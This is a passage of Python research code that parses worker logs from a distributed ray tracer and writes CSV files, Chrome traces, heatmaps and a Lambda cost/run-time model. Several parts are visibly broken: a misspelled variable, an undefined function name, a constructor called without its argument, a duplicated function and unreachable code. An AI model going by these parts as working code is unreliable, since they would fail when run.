data['timePerAction']: name = tup['name'] time = int(tup['time']) if ':' not in name: self.top_level_actions.add(name) time_per_action[name][timestamp] = time del data['timePerAction'] if 'metricsOverTime' in data: del data['metricsOverTime'] if 'intervalsPerAction' in data: del data['intervalsPerAction'] if 'bytesSentPerWorker' in data: for k, v in data['bytesSentPerWorker'].items(): bytes_sent_per_worker[k][timestamp] = v del data['bytesSentPerWorker'] if 'bytesReceivedPerWorker' in data: del data['bytesReceivedPerWorker'] for name, value in data.items(): self.metrics[name].append(float(value)) self.time_per_action = defaultdict(list) self.bytes_sent_per_worker = defaultdict(list) for t in self.timestamps: for k, v in time_per_action.items(): if t in v: value = v[t] else: value = 0 self.time_per_action[k].append(value) for k, v in bytes_sent_per_worker.items(): if t in v: value = v[t] else: value = 0 self.bytes_sent_per_worker[k].append(value) def percentage_action(self, action, idx=-1): if len(self.timestamps) == 0: return 0 if idx < 0: total = sum(self.time_per_action[action]) return total / self.timestamps[len(self.timestamps) - 1] else: assert len(self.timestamps) > idx start = self.timestamps[idx - 1] if idx > 0 else 0 end = self.timestamps[idx] interval = end - start return self.time_per_action[action][idx] / interval def percentage_busy(self, idx=-1): return 1.0 - self.percentage_action('poll', idx) class WorkerStats(object): def __init__(self, idx, file_path : str): self.idx = idx self.path = file_path self.aggregate_stats = defaultdict(list) self.queue_stats = defaultdict(list) treelet_stats = defaultdict(lambda: defaultdict(dict)) stat_keys = set() self.timestamps = [] with open(file_path, 'r') as f: _, start_timestamp = f.readline().strip().split(' ') self.start_timestamp = int(start_timestamp) prev_data = defaultdict(dict) for line in f: split_line = line.strip().split(' ') if len(split_line) < 2: continue timestamp, json_data = split_line timestamp = int(timestamp) self.timestamps.append(timestamp) data = json.loads(json_data) for k, v in data['aggregateStats'].items(): self.aggregate_stats[k].append(v) for k, v in data['queueStats'].items(): self.queue_stats[k].append(v) for ray_stats in data['objectStats']: object_key = ray_stats['id'] typ = object_key['type'] typ_id = int(object_key['id']) stats = ray_stats['stats'] if typ != TREELET_TYPE: continue for metric_name, v in stats.items(): prev_v = 0 if (typ_id in prev_data and metric_name in prev_data[typ_id]): prev_v = prev_data[typ_id][metric_name] treelet_stats[typ_id][metric_name][timestamp] = float(v) - prev_v prev_data[typ_id][metric_name] = float(v) stat_keys.add(metric_name) self.treelet_stats = {} for treelet_id in treelet_stats.keys(): self.treelet_stats[treelet_id] = {} for stat_key in stat_keys: self.treelet_stats[treelet_id][stat_key] = [] ll = self.treelet_stats[treelet_id][stat_key] tvs = treelet_stats[treelet_id][stat_key] for t in self.timestamps: if t in tvs: v = tvs[t] else: v = 0 ll.append(v) def _load_fn(diagnostics_directory, path): diag = None if path.endswith('DIAG'): diag = WorkerDiagnostics(int(path[:path.find('.DIAG')]), os.path.join(diagnostics_directory, path)) stats = None if path.endswith('STATS'): stats = WorkerStats(int(path[:path.find('.STATS')]), os.path.join(diagnostics_directory, path)) print('.', end='', flush=True) return diag, stats class Stats(object): def __init__(self, diagnostics_directory : str): worker_files = os.listdir(diagnostics_directory) self.worker_diagnostics = [] 
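# Note: the *.DIAG and *.STATS files are parsed in parallel below via multiprocessing.Pool; _load_fn returns a (diagnostics, stats) pair with exactly one side populated, depending on the file suffix, and the loop below appends each populated side to the matching list.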
self.worker_stats = [] with Pool() as p: results = p.map(partial(_load_fn, diagnostics_directory), worker_files) for d, s in results: if d: self.worker_diagnostics.append(d) if s: self.worker_stats.append(s) def write_csv(self, path: str): quanta = 2.0 * 1e6 # seconds -> microseconds start_timestamp = self.worker_stats[0].start_timestamp end_timestamp = 0 for stats in self.worker_stats: start_ts = stats.start_timestamp end_ts = start_ts + stats.timestamps[-1] if start_ts < start_timestamp or end_ts > end_timestamp: print('Current min {:d}, max {:d}'.format(start_timestamp, end_timestamp)) print('Worker id {:d}, min {:d}, max {:d}, path {:s}'.format(stats.idx, start_ts, end_ts, stats.path)) start_timestamp = min(start_timestamp, start_ts) end_timestamp = max(end_timestamp, end_ts) #for diag in self.worker_diagnostics: # start_ts = diag.start_timestamp # end_ts = start_ts + stats.timestamps[-1] # if start_ts < start_timestamp or end_ts > end_timestamp: # print('Current min {:d}, max {:d}'.format(start_timestamp, end_timestamp)) # print('Worker id {:d}, min {:d}, max {:d}, path {:s}'.format(diag.idx, # start_ts, end_ts, diag.path)) # start_timestamp = min(start_timestamp, start_ts) # end_timestamp = max(end_timestamp, end_ts) end_timestamp += quanta * 2 total_duration = end_timestamp - start_timestamp num_timepoints = int(math.ceil(total_duration / quanta)) print('Time bounds: ({:f}, {:f}), {:f} seconds'.format(start_timestamp * 1e-6, end_timestamp * 1e-6, total_duration * 1e-6)) print('Quantizing to {:2f} second interval'.format(quanta * 1e-6)) print('# timepoints:', num_timepoints) # Pre-process data to fixed quantization #fieldnames = ['workerID', 'treeletID', 'timestamp', # 'tracingRaysTime', 'idleTime', # 'raysWaiting', 'raysProcessed', 'raysGenerated', 'raysSending', 'raysReceived', # 'bandwidthIn', 'bandwidthOut'] # bandwidth, tracing time per_worker_data = {} per_worker_worker_fieldnames = [ 'workerID', 'targetWorkerID', 'timestamp', 'bytesSent'] per_worker_worker_data = {} # rays processed, rays generated, etc per_worker_treelet_fieldnames = [ 'workerID', 'treeletID', 'timestamp', 'raysWaiting', 'raysProcessed', 'raysGenerated', 'raysSending', 'raysReceived'] per_worker_treelet_data = {} csv_data = {} print('Quantizing worker stats', end='', flush=True) for stats in self.worker_stats: min_timestamp = stats.start_timestamp max_timestamp = min_timestamp + stats.timestamps[-1] # Get the treelet fields and quantize to global time scale treelet_rows = defaultdict(lambda: defaultdict(list)) for treelet_id, treelet_stats in stats.treelet_stats.items(): for field, key in [('processedRays', 'raysProcessed'), ('waitingRays', 'raysWaiting'), ('demandedRays', 'raysGenerated'), ('sendingRays', 'raysSending'), ('receivedRays', 'raysReceived')]: quantized_timestamps, quantized_data = quantize_sequence( [min_timestamp] + [min_timestamp + x for x in stats.timestamps], [0] + treelet_stats[field], quanta, start=start_timestamp, end=end_timestamp) treelet_rows[treelet_id][key] = quantized_data # Insert rows into per_worker_treelet_data for treelet_id, _ in stats.treelet_stats.items(): for i in range(num_timepoints): timepoint = start_timestamp + quanta * i data = { 'workerID': stats.idx, 'treeletID': treelet_id, 'timestamp': timepoint, } for k, v in treelet_rows[treelet_id].items(): data[k] = v[i] per_worker_treelet_data[(stats.idx, treelet_id, timepoint)] = data print('.', end='', flush=True) print() for diag in self.worker_diagnostics: for treelet_id, treelet_stats in stats.treelet_stats.items(): for 
tidx in range(num_timepoints): # tracingRaysTime timestamp = tidx * quanta print('Writing {:s}...'.format(path)) with open(path, 'w', newline='') as csvfile: writer = csv.DictWriter(csvfile, fieldnames=per_worker_treelet_fieldnames) writer.writeheader() for k, v in per_worker_treelet_data.items(): writer.writerow(v) print('Wrote {:s}.'.format(path)) class Constants(object): # Ray data structure size INT_SIZE = 4 * U.bytes FLOAT_SIZE = 4 * U.bytes STACK_LENGTH = 20 RAY_FIELDS = { 'origin': 2 * 3 * FLOAT_SIZE, 'sample_location': 2 * FLOAT_SIZE, 'min_t': FLOAT_SIZE, 'max_t': FLOAT_SIZE, 'weight': FLOAT_SIZE, 'medium': INT_SIZE, 'stack': INT_SIZE * STACK_LENGTH } RADIANCE_RAY_FIELDS = { 'origin_x': 3 * FLOAT_SIZE, 'direction_x': 3 * FLOAT_SIZE, 'origin_y': 3 * FLOAT_SIZE, 'direction_y': 3 * FLOAT_SIZE } SHADOW_RAY_SIZE = sum([x for _, x in RAY_FIELDS.items()]) RADIANCE_RAY_SIZE = SHADOW_RAY_SIZE + sum( [x for _, x in RADIANCE_RAY_FIELDS.items()]) # Global constants W = 1920 # image width H = 1080 # image height SAMPLES_PER_PIXEL = 256 # samples per pixel GEOMETRY_SIZE = 20 * U.gigabytes # size of the scene geometry TS = 1 * U.gigabytes # treelet size TT = GEOMETRY_SIZE / TS # total treelets S = W * H * SAMPLES_PER_PIXEL # samples per pixel L = 5 # average path length (# of bounces) T = np.log(TT) # average number of treelets per ray RAY_FOOTPRINT = SHADOW_RAY_SIZE * 0.5 + RADIANCE_RAY_SIZE * 0.5 # average ray footprint TOTAL_FOOTPRINT = (RAY_FOOTPRINT * S * (2 * L - 1)).to(U.gigabyte) LAMBDA_BANDWIDTH = 47 * U.gigabytes LAMBDA_BOOT_TIME = 4 LAMBDA_COST = 0.18 / (60 * 60) CPU_TIME_PER_RAY_TRAVERSAL = 40 * 1e-6 class SceneStats(object): def __init__(self, scene_file_path): self.geometry_size = 10 self.treelet_size = 10 self.num_treelets = 10 self.image_width = 1920 self.image_height = 1020 self.samples_per_pixel = 256 self.num_lambdas = 600 self.shadow_ray_size = Constants.SHADOW_RAY_SIZE self.radiance_ray_size = Constants.RADIANCE_RAY_SIZE self.ray_size = (self.shadow_ray_size + self.radiance_ray_size) / 2 self.total_samples = self.image_width * self.image_height * self.samples_per_pixel self.path_length = Constants.L self.traversals_per_ray = np.log(self.num_treelets) def write_trace(stats, path: str): """ Generates a trace file in Chrome format. To visualize the trace, visit chrome://tracing in Google Chrome and click "Load" in the top left to load the trace. Args ---- path Output path to write the trace. 
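# Note: `stats.intervals` is assumed to map worker_id -> [(action_name, start_ns, end_ns), ...], i.e. the structure produced by read_intervals() above; the Stats class defined in this file does not populate an `intervals` attribute itself, so the caller presumably attaches it.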
""" worker_intervals = stats.intervals # https://github.com/catapult-project/catapult/blob/master/tracing/tracing/base/color_scheme.html colors = {'idle': 'grey'} traces = [] def make_trace_from_interval(interval, proc, tid): name, start, end = interval cat = '' trace = { 'name': name, 'cat': cat, 'ph': 'X', 'ts': start / 1000, # ns to microseconds 'dur': (end - start) / 1000, 'pid': proc, 'tid': tid, 'args': {} } if interval[0] in colors: trace['cname'] = colors[interval[0]] return trace if False and self._master_profiler is not None: traces.append({ 'name': 'thread_name', 'ph': 'M', 'pid': -1, 'tid': 0, 'args': {'name': 'master'} }) for interval in self._master_profiler[1]['intervals']: traces.append(make_trace_from_interval(interval, 'master', -1, 0)) for worker_id, intervals in worker_intervals.items(): tid = worker_id worker_num = worker_id tag = None proc = worker_id print('Generating traces for worker {:d}...'.format(tid)) traces.append({ 'name': 'thread_name', 'ph': 'M', 'pid': proc, 'tid': tid, 'args': { 'name': '{:06d}'.format(worker_num) + ("_" + str(tag) if tag else "") } }) for interval in intervals: if interval[0] == 'idle': # We ignore the idle interval when visualizing continue traces.append(make_trace_from_interval(interval, proc, tid)) worker_metrics = stats.metrics def make_counter_from_metric(name, metric, proc, tid): time, value = metric cat = '' trace = { 'name': name, 'cat': cat, 'ph': 'C', 'ts': time / 1000, # ns to microseconds 'pid': proc, 'tid': tid, 'args': { name: value } } if metric[0] in colors: trace['cname'] = colors[interval[0]] return trace for worker_id, metrics in worker_metrics.items(): tid = worker_id worker_num = worker_id tag = None proc = worker_id print('Generating metrics for worker {:d}...'.format(tid)) for name, points in metrics.items(): for point in points: traces.append(make_counter_from_metric(name, point, proc, tid)) parts = path.split('.') base = parts[0] exts = parts[1:] with open(base + '.trace', 'w') as f: f.write(json.dumps(traces)) if exts == ['trace']: return path elif exts == ['tar', 'gz']: with tarfile.open(base + '.tar.gz', 'w:gz') as tar: tar.add(base + '.trace') os.remove(base + '.trace') return path else: raise Exception("Invalid trace extension '{}'. Must be .trace or .tar.gz." \ .format(''.join(['.' 
+ e for e in exts]))) def merge_sequences(timepoints : List[List[int]], data : List[List[float]]): raise Exception() merged_timepoints = [] merged_data = [] num_sequences = len(timepoints) offsets = [0 for _ in range(num_sequences)] while True: for i in range(num_sequences): pass return merged_timepoints, merged_data def quantize_sequence(timepoints, data, quanta, start=None, end=None, rate=False): quantized_timepoints = [] quantized_data = [] def push(timepoint, data): quantized_timepoints.append(timepoint) quantized_data.append(data) if len(data) == 0: return [] current_time = start or timepoints[0] end_time = end or timepoints[-1] # Insert zeros up to the start of timepoints if the start time is before # timepoints while current_time + quanta < timepoints[0]: push(current_time, 0) current_time += quanta # Find the starting offset if the start is inside the sequence offset = 1 if start: while offset < len(timepoints): time = timepoints[offset] if time > current_time: break offset += 1 current_time_in_interval = min(timepoints[offset - 1], current_time) prev_summed_value = 0 summed_value = 0 # Sum over multiple timepoints while offset < len(timepoints) and current_time < end_time: # Invariant: timepoints[offset - 1] <= current_time + quanta < timepoints[offset] prev_timepoint = timepoints[offset - 1] prev_value = data[offset - 1] timepoint = timepoints[offset] value = data[offset] interval = float(timepoint - prev_timepoint) contribution = value if rate: contribution /= interval # Add the contribution from this interval next_time_in_interval = min(timepoint, current_time + quanta) this_interval = float(next_time_in_interval - current_time_in_interval) if this_interval > 0: this_contribution = value * (this_interval / interval) if rate: this_contribution /= this_interval else: this_contribution = 0 summed_value += this_contribution if current_time + quanta <= timepoint: # We've reached the end of this quanta, so append a new entry push(current_time, prev_summed_value) prev_summed_value = summed_value summed_value = 0 current_time += quanta current_time_in_interval = current_time if current_time > timepoint: # Step to the next timepoint only if we've moved past the current # one offset += 1 else: # Still inside the quanta, so step to the next timepoint current_time_in_interval = timepoint offset += 1 # Add zeros at the end of the sequence while current_time < end_time: push(current_time, prev_summed_value) prev_summed_value = summed_value summed_value = 0 current_time += quanta return quantized_timepoints, quantized_data def heatmap(data, row_labels, col_labels, ax=None, cbar_kw={}, cbarlabel="", dense_xticks=False, dense_yticks=False, **kwargs): """ Create a heatmap from a numpy array and two lists of labels. Arguments: data : A 2D numpy array of shape (N,M) row_labels : A list or array of length N with the labels for the rows col_labels : A list or array of length M with the labels for the columns Optional arguments: ax : A matplotlib.axes.Axes instance to which the heatmap is plotted. If not provided, use current axes or create a new one. cbar_kw : A dictionary with arguments to :meth:`matplotlib.Figure.colorbar`. cbarlabel : The label for the colorbar All other arguments are directly passed on to the imshow call. """ if not ax: ax = plt.gca() # Plot the heatmap im = ax.imshow(data, **kwargs) # Create colorbar cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw) cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom") # We want to show all ticks... 
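# Note: unless dense_xticks/dense_yticks is set, the code below keeps only roughly five evenly spaced tick labels per axis so that large worker/treelet matrices remain readable.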
#ax.set_xticks(np.arange(data.shape[1])) # ... and label them with the respective list entries. if dense_xticks: xtick_spacing = 1 else: xtick_spacing = (data.shape[1] // 5) or 1 ax.set_xticks(np.arange(data.shape[1])[::xtick_spacing]) ax.set_xticklabels(col_labels[::xtick_spacing]) if dense_yticks: ytick_spacing = 1 else: ytick_spacing = (data.shape[0] // 5) or 1 ax.set_yticks(np.arange(data.shape[0])[::ytick_spacing]) ax.set_yticklabels(row_labels[::ytick_spacing]) # Let the horizontal axes labeling appear on top. #ax.tick_params(top=True, bottom=False, # labeltop=True, labelbottom=False) # Rotate the tick labels and set their alignment. #plt.setp(ax.get_xticklabels(), rotation=-30, ha="right", # rotation_mode="anchor") # Turn spines off and create white grid. for edge, spine in ax.spines.items(): spine.set_visible(False) ax.set_xticks(np.arange(data.shape[1]+1)-.5, minor=True) ax.set_yticks(np.arange(data.shape[0]+1)-.5, minor=True) ax.grid(which="minor", color="w", linestyle='-', linewidth=0.1) ax.grid(which="major", color="w", linestyle='-', linewidth=0) ax.tick_params(which="minor", bottom=False, left=False) plt.tight_layout() return im, cbar def annotate_heatmap(im, data=None, valfmt="{x:.2f}", textcolors=["black", "white"], threshold=None, **textkw): """ A function to annotate a heatmap. Arguments: im : The AxesImage to be labeled. Optional arguments: data : Data used to annotate. If None, the image's data is used. valfmt : The format of the annotations inside the heatmap. This should either use the string format method, e.g. "$ {x:.2f}", or be a :class:`matplotlib.ticker.Formatter`. textcolors : A list or array of two color specifications. The first is used for values below a threshold, the second for those above. threshold : Value in data units according to which the colors from textcolors are applied. If None (the default) uses the middle of the colormap as separation. Further arguments are passed on to the created text labels. """ if not isinstance(data, (list, np.ndarray)): data = im.get_array() # Normalize the threshold to the images color range. if threshold is not None: threshold = im.norm(threshold) else: threshold = im.norm(data.max())/2. # Set default alignment to center, but allow it to be # overwritten by textkw. kw = dict(horizontalalignment="center", verticalalignment="center") kw.update(textkw) # Get the formatter in case a string is supplied if isinstance(valfmt, str): valfmt = matplotlib.ticker.StrMethodFormatter(valfmt) # Loop over the data and create a `Text` for each "pixel". # Change the text's color depending on the data. 
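# Note: this module imports matplotlib only as `mpl`, so the bare `matplotlib.ticker.StrMethodFormatter` reference above would raise a NameError when `valfmt` is passed as a string; `mpl.ticker.StrMethodFormatter` (or an explicit `import matplotlib.ticker`) would be needed for that branch to run.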
texts = [] for i in range(data.shape[0]): for j in range(data.shape[1]): kw.update(color=textcolors[im.norm(data[i, j]) > threshold]) text = im.axes.text(j, i, valfmt(data[i, j], None), **kw) texts.append(text) return texts def plot_metric_heatmap(stats, metric_label, sort=False): quantization = 1000 * 1e6 # ms to nanoseconds # Deteremine number of rows num_timepoints = 0 for worker_id, metrics in stats.metrics.items(): points = metrics[metric_label] for time, _ in points: quantized_time = time // quantization if quantized_time > num_timepoints: num_timepoints = quantized_time num_timepoints = int(num_timepoints) + 1 # Deteremine number of columns num_workers = len(stats.metrics) data = np.zeros((num_workers, num_timepoints)) row_labels = [] for worker_idx, (worker_id, metrics) in enumerate(stats.metrics.items()): row_labels.append(worker_id) points = metrics[metric_label] quantized_points = quantize_sequence(points, quantization) for i, (time, value) in enumerate(quantized_points): data[worker_idx, i] = value * 1e9 col_labels = [int(x[0] * 1e-9) for x in quantized_points] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, norm=LogNorm()) return fig def plot_action_heatmap(worker_stats): num_worker_timestamps = len(worker_stats.timestamps) # Deteremine number of rows num_timepoints = num_worker_timestamps # Deteremine number of columns num_actions = len(worker_stats.top_level_actions) data = np.zeros((num_actions, num_timepoints)) row_labels = [] for action_idx, action_name in enumerate(sorted(list(worker_stats.top_level_actions))): row_labels.append(action_name) points = worker_stats.time_per_action[action_name] for i in range(num_timepoints): p = worker_stats.percentage_action(action_name, i) data[action_idx, i] = p col_labels = [int(x * 1e-6) for x in worker_stats.timestamps] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, dense_yticks=True, aspect='auto') return fig def plot_worker_heatmap(all_worker_stats, metric): '''Plot a treelet metric over time for all treelets''' workers = {} for w in all_worker_stats: workers[int(w.idx)] = w # Number of rows worker_ids = list(sorted(workers.keys())) # Determine number of columns timestamp_sets = [set(stats.timestamps) for stats in all_worker_stats] timestamps = set() for s in timestamp_sets: timestamps = timestamps.union(s) timestamps = sorted(list(timestamps)) num_timepoints = len(timestamps) data = np.zeros((len(worker_ids), num_timepoints)) row_labels = [] for i, idx in enumerate(worker_ids): row_labels.append(idx) points = workers[idx].aggregate_stats[metric] ts = workers[idx].timestamps for j, t in enumerate(timestamps): if t in ts: data[i, j] = points[ts.index(t)] col_labels = [int(x * 1e-6) for x in timestamps] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def plot_utilization_heatmap(all_worker_diags): '''Plot a treelet metric over time for all treelets''' workers = {} for w in all_worker_diags: workers[int(w.idx)] = w # Number of rows worker_ids = list(sorted(workers.keys())) # Determine number of columns timestamp_sets = [set(stats.timestamps) for stats in all_worker_diags] timestamps = set() for s in timestamp_sets: timestamps = timestamps.union(s) timestamps = sorted(list(timestamps)) num_timepoints = len(timestamps) data = np.zeros((len(worker_ids), num_timepoints)) row_labels = [] for i, idx in enumerate(worker_ids): row_labels.append(idx) ts = 
workers[idx].timestamps for j, t in enumerate(timestamps): if t in ts: data[i, j] = workers[idx].percentage_busy(ts.index(t)) col_labels = [int(x * 1e-6) for x in timestamps] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def aggregate_treelet_stats(all_worker_stats): # Get the list of treelet ids and stat keys treelet_ids = set() stat_keys = set() for worker in all_worker_stats: for treelet_id, treelet_stats in worker.treelet_stats.items(): treelet_ids.add(treelet_id) for k, _ in treelet_stats.items(): stat_keys.add(k) # Determine number of columns timestamp_sets = [set(stats.timestamps) for stats in all_worker_stats] timestamps = set() for s in timestamp_sets: timestamps = timestamps.union(s) timestamps = sorted(list(timestamps)) num_timepoints = len(timestamps) # Aggregate treelet stats across all workers treelet_stats = {} for tid in treelet_ids: treelet_stats[tid] = {} for key in stat_keys: treelet_stats[tid][key] = [0 for _ in range(num_timepoints)] for worker_stats in all_worker_stats: for i, t in enumerate(timestamps): if t in worker_stats.timestamps: idx = worker_stats.timestamps.index(t) for treelet_id, wtreelet_stats in worker_stats.treelet_stats.items(): for key in stat_keys: treelet_stats[treelet_id][key][i] += int(wtreelet_stats[key][idx]) return treelet_stats, timestamps def plot_treelet_heatmap(treelet_stats, timestamps, metric): '''Plot a treelet metric over time for all treelets''' # Number of rows treelet_ids = sorted([int(x) for x in list(treelet_stats.keys())]) # Number of columns num_timepoints = len(timestamps) data = np.zeros((len(treelet_ids), num_timepoints)) row_labels = [] for idx, treelet_id in enumerate(treelet_ids): row_labels.append(treelet_id) points = treelet_stats[treelet_id][metric] print(idx, end=' ') for i, d in enumerate(points): data[idx, i] = d if d > 100000: print(d, end=' ') print() col_labels = [int(x * 1e-6) for x in timestamps] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def plot_treelet_worker_rays(treelet_stats, worker_stats, metric, max_workers=15, normalized=False): '''Plot distribution of treelet rays to workers''' # Number of rows treelet_ids = sorted([int(x) for x in list(treelet_stats.keys())]) # Number of columns num_workers = min(len(worker_stats), max_workers) data = np.zeros((len(treelet_ids), num_workers)) row_labels = [] for idx, treelet_id in enumerate(treelet_ids): row_labels.append(treelet_id) treelet_value = sum(treelet_stats[treelet_id][metric]) or 0.00001 values = [] for i in range(len(worker_stats)): stats = worker_stats[i] value = 0 if treelet_id in stats.treelet_stats: value = sum([int(x) for x in stats.treelet_stats[treelet_id][metric]]) if normalized: value = value / treelet_value values.append(value) values.sort() values = list(reversed(values)) for i in range(num_workers): data[idx, i] = values[i] col_labels = range(num_workers) fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def plot_treelet_worker_rays(treelet_stats, worker_stats, metric, max_workers=15, normalized=False): '''Plot distribution of treelet rays to workers''' # Number of rows treelet_ids = sorted([int(x) for x in list(treelet_stats.keys())]) # Number of columns num_workers = min(len(worker_stats), max_workers) data = np.zeros((len(treelet_ids), num_workers)) row_labels = [] for idx, treelet_id in 
enumerate(treelet_ids): row_labels.append(treelet_id) treelet_value = sum(treelet_stats[treelet_id][metric]) or 0.00001 values = [] for i in range(len(worker_stats)): stats = worker_stats[i] value = 0 if treelet_id in stats.treelet_stats: value = sum([int(x) for x in stats.treelet_stats[treelet_id][metric]]) if normalized: value = value / treelet_value values.append(value) values.sort() values = list(reversed(values)) for i in range(num_workers): data[idx, i] = values[i] col_labels = range(num_workers) fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def plot_metrics(stats, path): quantization = 1000 * 1e6 # nanoseconds plt.clf() metric_labels = ['bytesSent', 'bytesReceived', 'outstandingUdp'] # Plot heatmaps for each worker over time # for metric_name in metric_labels: # fig = plot_metric_heatmap(stats, metric_name) # plt.savefig(os.path.join(path, 'heatmap_{:s}.png'.format(metric_name))) # plt.close(fig) # plt.clf() # Plot heatmaps showing time spent in each action for least/most idle worker, and average worker most_busy = 0.0 most_busy_worker = stats.worker_diagnostics[0] least_busy = 1.0 least_busy_worker = stats.worker_diagnostics[0] for worker in stats.worker_diagnostics: if len(worker.timestamps) == 0: continue busy = worker.percentage_busy() * len(worker.timestamps) if busy > most_busy: most_busy = busy most_busy_worker = worker if busy < least_busy: least_busy = busy least_busy_worker = worker if len(most_busy_worker.timestamps) > 0: fig = plot_action_heatmap(most_busy_worker) plt.savefig(os.path.join(path, 'most_busy_worker_action_heatmap.png')) plt.close(fig) plt.clf() print('Graphed most busy worker action heatmap.') if len(least_busy_worker.timestamps) > 0: fig = plot_action_heatmap(least_busy_worker) plt.savefig(os.path.join(path, 'least_busy_worker_action_heatmap.png')) plt.close(fig) plt.clf() print('Graphed least busy worker action heatmap.') print('Graphing worker heatmaps...') plot_utilization_heatmap(stats.worker_diagnostics) plt.savefig(os.path.join(path, 'worker_utilization_heatmap.png')) plt.close(fig) plt.clf() for metric in ['processedRays', 'receivedRays', 'sendingRays']: plot_worker_heatmap(stats.worker_stats, metric) plt.savefig(os.path.join(path, 'worker_heatmap_{:s}.png'.format(metric))) plt.close(fig) plt.clf() print('Graphed worker heatmaps.') print('Aggregating treelet stats...') treelet_stats, timestamps = aggregate_treelet_stats(stats.worker_stats) print('Done aggregating treelet stats.') for metric in ['sendingRays', 'processedRays']: plot_treelet_heatmap(treelet_stats, timestamps, metric) plt.savefig(os.path.join(path, 'treelet_heatmap_{:s}.png'.format(metric))) plt.close(fig) plt.clf() print('Graphed treelet heatmap.') plot_treelet_worker_rays(treelet_stats, stats.worker_stats, 'processedRays', normalized=True) plt.savefig(os.path.join(path, 'treelet_worker_processedRays_normalized.png')) plt.close(fig) plt.clf() plot_treelet_worker_rays(treelet_stats, stats.worker_stats, 'processedRays') plt.savefig(os.path.join(path, 'treelet_worker_processedRays.png')) plt.close(fig) plt.clf() print('Graphed treelet-worker heatmap.') return # Plot a chart over time showing min/median/max worker stats for metric_name in metric_labels: for worker_id, metrics in worker_stats.metrics.items(): data = { 'ids': [], 'time': [], 'value': [], } points = metrics[metric_name] current_time = quantization offset = 1 summed_value = 0 while offset < len(points): timePrev, valuePrev = points[offset - 1] 
time, value = points[offset] interval = float(time - timePrev) contribution = value / interval #print(metric_name, value, time, timePrev, interval) if time >= current_time: # Add % contribution from prior interval alpha = 1.0 - (time - current_time) / interval #print(time, current_time, alpha) summed_value += contribution * alpha data['ids'].append(worker_id) data['time'].append(current_time / 1e9) data['value'].append(summed_value * 1e9) # to seconds current_time += quantization summed_value = 0 beta = 1.0 - alpha summed_value += contribution * beta else: summed_value += contribution offset += 1 for i in range(len(data['time']) - 1): if data['time'][i + 1] < data['time'][i]: print(data['time'][i], data['time'][i + 1]) if False and metric_name == 'bytesReceived': print(data['time'], data['value']) print(points) plt.semilogy(data['time'], data['value']) plt.savefig(os.path.join(path, 'metric_{:s}.png'.format(metric_name))) plt.clf() def calculate_run_time(run_stats): '''Calculate the time of a run under the stationary treelets model The time of a run is: ''' boot_time = run_stats['boot_time'] worker_max_bandwidth = run_stats['worker_max_bandwidth'] total_bandwidth_used = (run_stats['total_bandwidth_used'] if 'total_bandwidth_used' in run_stats else 0) total_rays = run_stats['total_rays'] traversals_per_ray = run_stats['traversals_per_ray'] total_ray_traversals = (run_stats['total_ray_traversals'] if 'total_ray_traversals' in run_stats else total_rays * traversals_per_ray) ray_footprint = run_stats['ray_footprint'] cpu_time_per_ray_traversal = run_stats['cpu_time_per_ray_traversal'] num_workers = run_stats['num_workers'] geometry_size = run_stats['geometry_size'] num_treelets = run_stats['num_treelets'] treelet_size = (run_stats['treelet_size'] if 'treelet_size' in run_stats else geometry_size / num_treelets) # boot time + time to load treelets + max(io time, compute time) io_time = total_rays * traverasls_per_ray * ray_footprint / (num_workers * worker_max_bandwidth) compute_time = total_rays * cpu_time_per_ray_traversal / num_workers total_time = boot_time + treelet_size / worker_max_bandwidth + max(io_time, compute_time) return total_time def calculate_model_run_time(scene_stats, num_workers): total_rays = scene_stats.total_rays * (2 * scene_stats.path_length - 1) traversals_per_ray = scene_stats.traversals_per_ray ray_footprint = scene_stats.ray_footprint total_bandwidth = total_rays * treelet_visits_per_ray * ray_footprint worker_bandwidth = Constants.WORKER_BANDWIDTH G = scene_stats.geometry_size TS = 0.1 # treelet size TREELETS_PER_RAY = np.log(G / TS) / np.log(2) print(Constants.L) NR = 2200000000 #L_B = 30/1000 L_B = 1/8 BB_B = 5/8 R = 64/(1000*1000*1000) stats = { 'boot_time': Constants.LAMBDA_BOOT_TIME, 'worker_max_bandwidth': Constants.LAMBDA_BANDWIDTH, 'total_rays': total_rays, 'traversasls_per_ray': traversals_per_ray, 'ray_footprint': Constants.RAY_FOOTPRINT, 'cpu_time_per_ray_traversal': Constants.CPU_TIME_PER_RAY_TRAVERSAL, 'treelet_size': scene_stats.treelet_size, } total_times = [calculate_run_time({**stats, 'num_workers': w}) for w in num_workers] return total_times def compare_model(): # Get scene information scene_stats = SceneStats() num_workers = range(1, 8001) total_times = calculate_model_run_times(scene_stats, num_workers) costs = [t * w * Constants.LAMBDA_COST for t, w in zip(total_times, num_workers)] #plt.plot(price_kf, total_time_kf, label='kf') plt.plot(costs, total_times, label='lambda') #plt.hlines([L_BOOT_TIME + TS / L_B], 0, 15) plt.ylim(0, 500) 
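# Added worked example of the run-time model implemented by calculate_run_time()
# above, using made-up numbers purely for illustration (not measurements).
# Note that the io_time expression above refers to `traverasls_per_ray`, which
# appears to be a typo for `traversals_per_ray`; the sketch below spells it
# consistently.
def _run_time_model_example():
    boot_time = 4.0                    # seconds, assumed
    treelet_size = 100e6               # bytes, assumed
    worker_max_bandwidth = 100e6       # bytes/second per worker, assumed
    total_rays = 1e9
    traversals_per_ray = 8
    ray_footprint = 64                 # bytes per ray
    cpu_time_per_ray_traversal = 2e-6  # seconds
    num_workers = 1000

    io_time = (total_rays * traversals_per_ray * ray_footprint
               / (num_workers * worker_max_bandwidth))                    # 5.12 s
    compute_time = total_rays * cpu_time_per_ray_traversal / num_workers  # 2.0 s
    # boot time + time to load one treelet + max(io time, compute time)
    total_time = (boot_time + treelet_size / worker_max_bandwidth
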